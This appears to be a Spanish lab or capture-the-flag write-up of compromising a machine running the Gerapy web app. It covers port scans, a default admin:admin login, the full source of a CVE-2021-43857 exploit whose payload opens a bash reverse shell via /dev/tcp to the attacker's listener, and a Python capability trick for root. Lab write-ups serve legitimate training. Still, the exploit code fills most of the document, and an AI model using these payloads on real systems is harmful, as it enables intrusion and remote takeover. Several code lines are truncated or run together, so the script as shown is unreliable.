Enumere los puertos abiertos de la maquina.
Copy nmap -p- --open -sS --min-rate 2000 -vvv -n -Pn 192.168.190.24 -oG Basicscan.txt Puertos abiertos: 22 (ssh) y 80 (http)
Copy nmap -p22,8000 -sCV 192.168.190.24 -oN Fullscan.txt Ingrese al realizar un reconocimiento a la aplicación web que corre por el puerto 80. Con la herramienta whatweb observe las tecnologías que corren en la aplicación.
Una vez dentro, me encontré con un panel de sesión con titulo GERAPY.
La herramienta wappalyzer funciona al igual que whatweb, su fin es ver las tecnologías que corren el la web.
Probé contraseñas por defecto, en este caso admin:admin y pude loguearme con exito.
Realizando un inspección a la web y vi la versión de la aplicativo web: "geraply 0.6.7"
Teniendo la versión busque si existe algún exploit en google y encontré que es vulnerable a Remote Comman Executon con autenticación.
Me traigo el exploit a mi maquina atacante y le pase los comandos requeridos para que sea ejecutado con éxito.
Copy python3 exploit.py -t 192.168.190.24 -p 8000 -L 192.168.45.233 -P 4444 INFO EXPLOIT ARREGLADO DE GITHUB.
Copy #!/usr/bin/python
import sys import re
import argparse import pyfiglet import requests import time
import json
import subprocess
banner = pyfiglet.figlet_format("CVE-2021-43857")
print(banner)
print('Exploit for CVE-2021-43857') print('For: Gerapy < 0.9.8')
login = "admin" # CHANGE ME IF NEEDED
password = "admin" # CHANGE ME IF NEEDED
class Exploit:
def init (self, target_ip, target_port, localhost, localport):
self.target_ip = target_ip
self.target_port = target_port self.localhost = localhost
self.localport = localport
def exploitation(self): payload = (
'{"spider":"`/bin/bash -c \'bash -i >& /dev/tcp/'
+ self.localhost
+ "/"
+ self.localport
+ " 0>&1\'`\"}"
)
# Login to the app (getting auth token)
url = "http://" + self.target_ip + ":" + self.target_port r = requests.Session()
print("[*] Resolving URL...") r1 = r.get(url)
time.sleep(3)
print("[*] Logging in to application...") r2 = r.post(
url + "/api/user/auth",
json={"username": login, "password": password}, allow_redirects=True,
)
time.sleep(3)
if r2.status_code == 200:
print("[*] Login successful! Proceeding...") else:
print("[*] Something went wrong!") quit()
# Create a header out of auth token dict_auth = r2.json()
temp_token = "Token " + dict_auth.get("token", "") if not temp_token.strip():
print("[!] Authentication token not found.") quit()
auth_token = {"Authorization": temp_token}
# Get the project list
print("[*] Getting the project list")
r3 = r.get(url + "/api/project/index", headers=auth_token, allow_redirects=T time.sleep(3)
if r3.status_code != 200:
print("[!] Something went wrong! Maybe the token is corrupted?") quit()
try:
# Parse the project name from JSON response
project_list = r3.json() # Convert response JSON to Python object if not project_list:
print("[!] No projects found in the response.") quit()
name = project_list[0].get("name") if not name:
print("[!] The project does not have an associated name.") quit()
print("[*] Found project: " + name)
except (IndexError, KeyError, json.JSONDecodeError) as e: print(f"[!] Error processing the project list: {e}") quit()
# Get project ID
print("[*] Getting the ID of the project to build the URL") r4 = r.get(
url + "/api/project/" + name + "/build", headers=auth_token,
allow_redirects=True,
)
time.sleep(3)
if r4.status_code != 200:
print("[*] Something went wrong! I can't reach the found project!") quit()
try:
project_details = r4.json()
project_id = project_details.get("id") if not project_id:
print("[!] Project ID not found in response.") quit()
print(f"[*] Found ID of the project: {project_id}") except (KeyError, json.JSONDecodeError) as e:
print(f"[!] Error processing project details: {e}") quit()
# Netcat listener
print("[*] Setting up a netcat listener")
listener = subprocess.Popen(["nc", "-nvlp", self.localport]) time.sleep(3)
# Execute the payload
print("[*] Executing reverse shell payload") print("[*] Watch out for shell! :)")
r5 = r.post(
url + "/api/project/" + str(project_id) + "/parse", data=payload,
headers=auth_token,
allow_redirects=True,
)
listener.wait()
if r5.status_code == 200: print("[*] It worked!") listener.wait()
else:
print("[!] Something went wrong!") listener.terminate()
def get_args():
parser = argparse.ArgumentParser(
description="Gerapy < 0.9.8 Remote Code Execution (Authenticated)"
)
parser.add_argument("-t", "--target", dest="url", required=True, action="store", parser.add_argument("-p", "--port", dest="target_port", required=True, action="s parser.add_argument("-L", "--lh", dest="localhost", required=True, action="store parser.add_argument("-P", "--lp", dest="localport", required=True, action="store args = parser.parse_args()
return args
args = get_args()
target_ip = args.url
target_port = args.target_port localhost = args.localhost
localport = args.localport
exp = Exploit(target_ip, target_port, localhost, localport) exp.exploitation() Pude acceder a la maquina por lo que pase a realizar un reconocimiento de ella.
Logre subir Linpeas y ejecutarlo, una vez que termino el escaneo me encontró una vía vulnerable para realizar la escalada de privilegios.
Lo que encontré fue una capabilites de python 3.6.
Copy getcap / -r 2>/dev/null # ver capabilites En el siguiente articulo me mostro como explotar tal capabilites.
Copy /usr/bin/python3.6 -c 'import os; os.setuid(0); os.system("/bin/bash")' Logre ser usuario root.
